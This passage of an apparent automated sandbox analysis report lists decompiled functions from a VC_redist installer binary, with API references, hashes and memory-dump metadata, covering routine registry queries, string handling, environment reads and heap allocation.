                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 3660427363-955085611
                                                                          • Opcode ID: c4b8d2b8b26f9583224b99bff8a3772cdb9b81ae4bca82ccb91febd256b5fe79
                                                                          • Instruction ID: 6e4c56a01ea17ce5e687d39123091902c27ed15d8000075e79019bf70f9e2e97
                                                                          • Opcode Fuzzy Hash: c4b8d2b8b26f9583224b99bff8a3772cdb9b81ae4bca82ccb91febd256b5fe79
                                                                          • Instruction Fuzzy Hash: 2D214972A0111DFFDF649E9588449FEBBB9EB04360F1081B9EA14E7A11D2318E51EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000BF5E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 83%
                                                                          			E000BF5E0(void* __ecx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				void* _t29;

				_t25 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t19 = E000F0E3F( *((intOrPtr*)(_a4 + 0x4c)),  *((intOrPtr*)(_a4 + 0x50)), 1,  &_v8); // executed
				_t29 = _t19;
				if(_t29 >= 0) {
					_t29 = E000F0EEC(_t25, _v8, L"Installed",  &_v12);
				}
				if(_t29 == 0x80070002 || _t29 == 0x80070003) {
					_t29 = 0;
				}
				 *_a8 = 0 | _v12 == 0x00000001;
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t29;
			}







                                                                          0x000bf5e0
                                                                          0x000bf5e3
                                                                          0x000bf5e4
                                                                          0x000bf5e5
                                                                          0x000bf5ec
                                                                          0x000bf5fd
                                                                          0x000bf602
                                                                          0x000bf606
                                                                          0x000bf619
                                                                          0x000bf619
                                                                          0x000bf621
                                                                          0x000bf62b
                                                                          0x000bf62b
                                                                          0x000bf63d
                                                                          0x000bf63f
                                                                          0x000bf644
                                                                          0x000bf644
                                                                          0x000bf650

                                                                          APIs
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,000C7B4D,?,?,?), ref: 000BF644
                                                                            • Part of subcall function 000F0EEC: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000078,00000000,?,?,?,000F56EF,00000000,?,000F63FF,00000078,00000000), ref: 000F0F10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: Installed
                                                                          • API String ID: 3677997916-3662710971
                                                                          • Opcode ID: 8d78c6d87e471112d635a94b04d2b9c13b26e965edb038e28f22131b305ced09
                                                                          • Instruction ID: 61f8ada2f4539392c84e2d7b3f3481c4f0a72a650cd49e87548f397b0522ab89
                                                                          • Opcode Fuzzy Hash: 8d78c6d87e471112d635a94b04d2b9c13b26e965edb038e28f22131b305ced09
                                                                          • Instruction Fuzzy Hash: 2D01A232910119FFCB11EB94CC46BEEBBB8EF04711F1141A4E900A7161D7765E50DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F9006 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E000F9006(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t23;
				void* _t26;

				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_push(_a12);
				_push( *0x11a7e4);
				_push(_a8);
				_t26 = E000B1F20( &_v12, L"%ls%ls\\%ls\\%ls",  *0x11a7e0);
				if(_t26 >= 0) {
					_t23 = E000F0E3F(_a4, _v12, 0x20019,  &_v8); // executed
					_t26 = _t23;
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
					_v8 = _v8 & 0x00000000;
				}
				if(_v12 != 0) {
					E000F54EF(_v12);
				}
				return _t26;
			}







                                                                          0x000f900b
                                                                          0x000f9012
                                                                          0x000f9017
                                                                          0x000f901a
                                                                          0x000f9020
                                                                          0x000f9034
                                                                          0x000f903b
                                                                          0x000f904c
                                                                          0x000f9051
                                                                          0x000f9051
                                                                          0x000f9057
                                                                          0x000f905c
                                                                          0x000f9062
                                                                          0x000f9062
                                                                          0x000f906a
                                                                          0x000f906f
                                                                          0x000f906f
                                                                          0x000f907a

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000,000000B0,00000088,00000410,000002C0), ref: 000F905C
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %ls%ls\%ls\%ls
                                                                          • API String ID: 47109696-1267659288
                                                                          • Opcode ID: fb83883285f67d1e84944abdfdbfd70fb3cc825e160324cab6bf1a357e177b2a
                                                                          • Instruction ID: 8fc60f117ecc84585ad49584b0acaccccca1e71fca3886cd93aefde2fa060b9e
                                                                          • Opcode Fuzzy Hash: fb83883285f67d1e84944abdfdbfd70fb3cc825e160324cab6bf1a357e177b2a
                                                                          • Instruction Fuzzy Hash: F201283280121CFBDF22AB90DD06BEDBFB9EB04366F004094FA0066461D7765BA0EB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000EF7E0 Relevance: 3.0, APIs: 2, Instructions: 43stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000EF7E0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, WCHAR* _a12) {
				int _v8;
				int _t11;
				void* _t12;
				void* _t21;
				void* _t30;
				intOrPtr* _t33;

				_t11 = lstrlenW(_a12);
				_t33 = _a8;
				_v8 = _t11;
				_t30 = _t11 + _t11;
				_t12 = E000EF462(_a4,  *_t33 + 4 + _t30); // executed
				_t21 = _t12;
				if(_t21 >= 0) {
					 *( *_a4 +  *_t33) = _v8;
					 *_t33 =  *_t33 + 4;
					E000D1664( *_a4 +  *_t33, _t30, _a12, _t30);
					 *_t33 =  *_t33 + _t30;
				}
				return _t21;
			}









                                                                          0x000ef7ea
                                                                          0x000ef7f0
                                                                          0x000ef7f3
                                                                          0x000ef7f6
                                                                          0x000ef804
                                                                          0x000ef809
                                                                          0x000ef80d
                                                                          0x000ef81e
                                                                          0x000ef824
                                                                          0x000ef82c
                                                                          0x000ef834
                                                                          0x000ef834
                                                                          0x000ef83e

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,000CD1B4,00000001,00000000,?,-00000001,?,?,00000000,00000001), ref: 000EF7EA
                                                                          • _memcpy_s.LIBCMT ref: 000EF82C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: _memcpy_slstrlen
                                                                          • String ID:
                                                                          • API String ID: 2392212498-0
                                                                          • Opcode ID: 860caa3b786c3f4ceb6bdc2538d6f9b7248a770a9c401b7ec8affa0a3117a35a
                                                                          • Instruction ID: 3690af20740b9ea63b7cadc1ecefec948af356e9a43f9d6968eb436e44859763
                                                                          • Opcode Fuzzy Hash: 860caa3b786c3f4ceb6bdc2538d6f9b7248a770a9c401b7ec8affa0a3117a35a
                                                                          • Instruction Fuzzy Hash: EA014B75600305EFDB20CF4ACC84DAABBB8FF99310B10446DF94597321EA31AE50DBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000E85A5 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000E85A5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E000E856E(_t19) - _t19 >> 1) + (E000E856E(_t19) - _t19 >> 1);
					_t6 = E000E5154(_t14, (E000E856E(_t19) - _t19 >> 1) + (E000E856E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E000DF0F0(_t18, _t19, _t12);
					}
					E000E511A(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                                                                          0x000e85a5
                                                                          0x000e85af
                                                                          0x000e85b3
                                                                          0x000e85c4
                                                                          0x000e85c8
                                                                          0x000e85cd
                                                                          0x000e85d3
                                                                          0x000e85d8
                                                                          0x000e85dd
                                                                          0x000e85e2
                                                                          0x000e85e9
                                                                          0x000e85b5
                                                                          0x000e85b5
                                                                          0x000e85b5
                                                                          0x000e85f4

                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 000E85A9
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000E85E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free
                                                                          • String ID:
                                                                          • API String ID: 3328510275-0
                                                                          • Opcode ID: 13f93322c44e8040f20d536249460377b3c8b3d321b4ef57aa2ca078168783c2
                                                                          • Instruction ID: 47b4c1165befc8efcb0804471daaa94b249883cfaf508e0f2e11bb060806634e
                                                                          • Opcode Fuzzy Hash: 13f93322c44e8040f20d536249460377b3c8b3d321b4ef57aa2ca078168783c2
                                                                          • Instruction Fuzzy Hash: 31E0E533101D516FE12222267C4AABF2A48DFC17B17254015F10CA6242FF248D0181B4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B38D4 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E000B38D4(long _a4, signed int _a8) {
				void* _t7;

				asm("sbb eax, eax");
				_t7 = RtlAllocateHeap(GetProcessHeap(),  ~_a8 & 0x00000008, _a4); // executed
				return _t7;
			}




                                                                          0x000b38df
                                                                          0x000b38ec
                                                                          0x000b38f3

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,000B1490,00000000,00000001,00000000,?,?,000B1511,?,?,00000001,00000000,00000000,?), ref: 000B38E5
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,000B1490,00000000,00000001,00000000,?,?,000B1511,?,?,00000001,00000000,00000000,?), ref: 000B38EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID:
                                                                          • API String ID: 1357844191-0
                                                                          • Opcode ID: eea6ce7192d17009e4698d9bf157553a2b999a4537b600ca68aa7ea106742eba
                                                                          • Instruction ID: 5f68e4dfcafe515ad5948d4c8379d5a0add69f10ead6c0afff7ba48af968e3c6
                                                                          • Opcode Fuzzy Hash: eea6ce7192d17009e4698d9bf157553a2b999a4537b600ca68aa7ea106742eba
                                                                          • Instruction Fuzzy Hash: 0AC012321A0208AB8B00AFF8EC0ECAA3BACBB686027408400B905C2510CB3CE024EB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F3499 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E000F3499(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				short _v30;
				void _v32;
				void* _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				void* _v56;
				short _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				void* _t39;
				void* _t46;
				void* _t48;
				short _t49;
				void* _t55;
				intOrPtr* _t59;
				signed int _t60;
				void* _t65;
				signed int _t74;
				void* _t75;
				void* _t76;

				_t31 =  *0x11a008; // 0xf77c1860
				_v8 = _t31 ^ _t74;
				_v40 = _a4;
				_v48 = _a12;
				_t60 = 6;
				memset( &_v32, 0, _t60 << 2);
				_t76 = _t75 + 0xc;
				_v36 = 0;
				_v44 = 0;
				__imp__#8( &_v64);
				_t39 = E000F2F23(0,  &_v36, 0); // executed
				_t59 = _v36;
				_t69 = 1;
				_t71 =  ==  ? 0x80004005 : _t39;
				if(( ==  ? 0x80004005 : _t39) >= 0) {
					_t46 =  *((intOrPtr*)( *_t59 + 0x110))(_t59, 0);
					_t71 = _t46;
					if(_t46 >= 0) {
						_t48 =  *((intOrPtr*)( *_t59 + 0x118))(_t59, 0);
						_t71 = _t48;
						if(_t48 >= 0) {
							_t49 = 0x12;
							_v30 = _t49;
							_v20 = _v40;
							_v32 = 1;
							_v28 = 1;
							_v16 = _a8;
							_t69 = _t76 - 0x10;
							_v64 = 0x2011;
							_v56 =  &_v32;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd"); // executed
							_t55 =  *((intOrPtr*)( *_t59 + 0xe8))(_t59,  &_v44);
							_t71 =  ==  ? 0x8007006e : _t55;
							if(( ==  ? 0x8007006e : _t55) >= 0) {
								 *_v48 = _t59;
								_t59 = 0;
							}
						}
					}
				}
				if(_t59 != 0) {
					 *((intOrPtr*)( *_t59 + 8))(_t59);
				}
				return E000DDE36(_t59, _v8 ^ _t74, _t65, _t69, _t71);
			}































                                                                          0x000f349f
                                                                          0x000f34a6
                                                                          0x000f34af
                                                                          0x000f34bc
                                                                          0x000f34c1
                                                                          0x000f34c2
                                                                          0x000f34c2
                                                                          0x000f34c7
                                                                          0x000f34cb
                                                                          0x000f34ce
                                                                          0x000f34da
                                                                          0x000f34df
                                                                          0x000f34e6
                                                                          0x000f34ee
                                                                          0x000f34f3
                                                                          0x000f34fa
                                                                          0x000f3500
                                                                          0x000f3504
                                                                          0x000f350b
                                                                          0x000f3511
                                                                          0x000f3515
                                                                          0x000f3519
                                                                          0x000f351a
                                                                          0x000f3527
                                                                          0x000f352d
                                                                          0x000f3531
                                                                          0x000f3535
                                                                          0x000f3540
                                                                          0x000f3542
                                                                          0x000f3549
                                                                          0x000f354e
                                                                          0x000f3550
                                                                          0x000f3551
                                                                          0x000f3552
                                                                          0x000f3553
                                                                          0x000f3563
                                                                          0x000f3568
                                                                          0x000f356d
                                                                          0x000f356f
                                                                          0x000f356f
                                                                          0x000f3568
                                                                          0x000f3515
                                                                          0x000f3504
                                                                          0x000f3573
                                                                          0x000f3578
                                                                          0x000f3578
                                                                          0x000f358d

                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 000F34CE
                                                                            • Part of subcall function 000F2F23: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,000F34DF,00000000,?,00000000), ref: 000F2F3D
                                                                            • Part of subcall function 000F2F23: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000DBDED,?,000B52FD,?,00000000,?), ref: 000F2F49
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandleInitLastModuleVariant
                                                                          • String ID:
                                                                          • API String ID: 52713655-0
                                                                          • Opcode ID: a9d2ee5f85568af47f200e94236ec86b15a9944416841882a65c34767af5ca75
                                                                          • Instruction ID: 8f3c3b7ad405bd2cffbff6157e9105075ecd99b80f0dc550e996881a7e2778ed
                                                                          • Opcode Fuzzy Hash: a9d2ee5f85568af47f200e94236ec86b15a9944416841882a65c34767af5ca75
                                                                          • Instruction Fuzzy Hash: 16311C76E0061D9BCB11DFA8C884AEEB7F8EF48750F01456AED15EB311D6759E048BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D993C Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E000D993C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a52) {
				intOrPtr* _t29;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t37;
				intOrPtr _t42;
				signed int _t46;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t52;
				void* _t56;

				_t52 = _a52;
				_t29 =  *((intOrPtr*)(_t52 + 4));
				if(_t29 != 0) {
					L2:
					_t42 =  *_t29;
				} else {
					_t29 =  *((intOrPtr*)(_t52 + 8));
					if(_t29 == 0) {
						_t42 = 0;
					} else {
						goto L2;
					}
				}
				_t30 =  *((intOrPtr*)(_t52 + 0xc));
				if(_t30 == 0) {
					_a52 = 0;
				} else {
					_a52 =  *_t30;
				}
				_t46 =  *((intOrPtr*)(_t52 + 0x10)) + _a12;
				_t48 =  *(_t52 + 0x14);
				asm("adc edx, [ebp+0x14]");
				_t56 =  *(_t52 + 0x14) -  *(_t52 + 0x1c);
				if(_t56 >= 0 && (_t56 > 0 || _t46 >  *(_t52 + 0x18))) {
					_t46 =  *(_t52 + 0x18);
					_t48 =  *(_t52 + 0x1c);
				}
				if(( *(_t52 + 0x18) |  *(_t52 + 0x1c)) == 0) {
					_t49 = 0;
				} else {
					_t49 = E000DE120(E000DE080(_t46, _t48, 0x64, 0), _t48,  *(_t52 + 0x18),  *(_t52 + 0x1c));
				}
				_t34 =  *((intOrPtr*)( *_t52 + 0x10));
				_t37 = E000BD409( *_t52, 0, 1,  *((intOrPtr*)( *_t34 + 0x94))(_t34, _t42, _a52, _a12, _a16, _a4, _a8, _t49)) + 1;
				if(_t37 > 0xc) {
					L17:
					 *((intOrPtr*)(_t52 + 0x24)) = 1;
					goto L18;
				} else {
					switch( *((intOrPtr*)(_t37 * 4 +  &M000D99FC))) {
						case 0:
							goto L17;
						case 1:
							goto L19;
						case 2:
							 *((intOrPtr*)(_t52 + 0x20)) = 1;
							L18:
							_t51 = 1;
							goto L19;
					}
				}
				L19:
				return _t51;
			}













                                                                          0x000d9941
                                                                          0x000d9947
                                                                          0x000d994c
                                                                          0x000d9955
                                                                          0x000d9955
                                                                          0x000d994e
                                                                          0x000d994e
                                                                          0x000d9953
                                                                          0x000d9959
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d9953
                                                                          0x000d995b
                                                                          0x000d9960
                                                                          0x000d9969
                                                                          0x000d9962
                                                                          0x000d9964
                                                                          0x000d9964
                                                                          0x000d996f
                                                                          0x000d9972
                                                                          0x000d9975
                                                                          0x000d9978
                                                                          0x000d997b
                                                                          0x000d9984
                                                                          0x000d9987
                                                                          0x000d9987
                                                                          0x000d9990
                                                                          0x000d99ad
                                                                          0x000d9992
                                                                          0x000d99a9
                                                                          0x000d99a9
                                                                          0x000d99b8
                                                                          0x000d99db
                                                                          0x000d99df
                                                                          0x000d99ed
                                                                          0x000d99ed
                                                                          0x00000000
                                                                          0x000d99e1
                                                                          0x000d99e1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d99e8
                                                                          0x000d99f0
                                                                          0x000d99f0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d99e1
                                                                          0x000d99f2
                                                                          0x000d99f8

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldiv
                                                                          • String ID:
                                                                          • API String ID: 3732870572-0
                                                                          • Opcode ID: c376ef3ff67b7fb1bf85b9c69d9945b961142c51204d39830a96e4794472f349
                                                                          • Instruction ID: 20bc38a50f8c476ddd635967489a42a70305d84e1a2fbdcf8524c269139ee183
                                                                          • Opcode Fuzzy Hash: c376ef3ff67b7fb1bf85b9c69d9945b961142c51204d39830a96e4794472f349
                                                                          • Instruction Fuzzy Hash: E921F371200705AFDB60DE5AC890D6BF7FAEF897507148A1EFA8687711C231E852CB70
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F907D Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E000F907D(void* __ebx, void* __ecx, void* _a4, intOrPtr _a8, char** _a12, char** _a16, char** _a20) {
				void* _v8;
				void* _v12;
				void* _t28;
				void* _t33;
				void* _t43;

				_push(__ecx);
				_push(__ecx);
				_v12 = 0;
				_v8 = 0;
				_t43 = E000F8CFB(__ecx, _a8,  &_v12);
				if(_t43 < 0) {
					L11:
					if(_v8 != 0) {
						RegCloseKey(_v8); // executed
						_v8 = 0;
					}
					if(_v12 != 0) {
						E000F54EF(_v12);
					}
					return _t43;
				}
				_t28 = E000F0E3F(_a4, _v12, 0x20019,  &_v8); // executed
				_t43 = _t28;
				if(_t43 != 0x80070002) {
					if(_t43 < 0) {
						L10:
						goto L11;
					}
					if(_a12 == 0) {
						L6:
						if(_a16 == 0) {
							L8:
							if(_a20 != 0) {
								_t43 =  ==  ? 0 : E000F124D(_v8,  *0x11a7cc, _a20);
							}
							goto L10;
						}
						_t43 =  ==  ? 0 : E000F0F6E(_v8,  *0x11a7d0, _a16);
						if(_t43 < 0) {
							goto L10;
						}
						goto L8;
					}
					_t33 = E000F0F6E(_v8, 0, _a12); // executed
					_t43 =  ==  ? 0 : _t33;
					if(_t43 < 0) {
						goto L10;
					}
					goto L6;
				}
				_t43 = 0x80070490;
				goto L10;
			}








                                                                          0x000f9080
                                                                          0x000f9081
                                                                          0x000f908d
                                                                          0x000f9090
                                                                          0x000f9098
                                                                          0x000f909c
                                                                          0x000f912e
                                                                          0x000f9131
                                                                          0x000f9136
                                                                          0x000f913c
                                                                          0x000f913c
                                                                          0x000f9142
                                                                          0x000f9147
                                                                          0x000f9147
                                                                          0x000f9153
                                                                          0x000f9153
                                                                          0x000f90b2
                                                                          0x000f90b7
                                                                          0x000f90c0
                                                                          0x000f90cb
                                                                          0x000f912d
                                                                          0x00000000
                                                                          0x000f912d
                                                                          0x000f90d0
                                                                          0x000f90eb
                                                                          0x000f90ee
                                                                          0x000f910e
                                                                          0x000f9111
                                                                          0x000f912a
                                                                          0x000f912a
                                                                          0x00000000
                                                                          0x000f9111
                                                                          0x000f9107
                                                                          0x000f910c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f910c
                                                                          0x000f90d9
                                                                          0x000f90e4
                                                                          0x000f90e9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f90e9
                                                                          0x000f90c2
                                                                          0x00000000

                                                                          APIs
                                                                            • Part of subcall function 000F8CFB: lstrlenW.KERNEL32(00000100,?,?,000F9098,000002C0,00000100,00000100,00000100,?,?,?,000D7B40,?,?,000001BC,00000000), ref: 000F8D1B
                                                                          • RegCloseKey.KERNELBASE(000002C0,000002C0,00000100,00000100,00000100,?,?,?,000D7B40,?,?,000001BC,00000000,00000000,00000000,00000100), ref: 000F9136
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenlstrlen
                                                                          • String ID:
                                                                          • API String ID: 514153755-0
                                                                          • Opcode ID: 38e53e57fe1c1d007fa493198595e0b1ca1cfcb63e4999e60585d501feb6c20e
                                                                          • Instruction ID: a6525e5d87104132fd5c64456f1727608f682b83870b613a900849d94e7c1844
                                                                          • Opcode Fuzzy Hash: 38e53e57fe1c1d007fa493198595e0b1ca1cfcb63e4999e60585d501feb6c20e
                                                                          • Instruction Fuzzy Hash: 6A214172C0152EEBCF22AFA4CC459FEBAB5EB44750B114675EA01A7921D6324E50BBD0
                                                                          Uniqueness

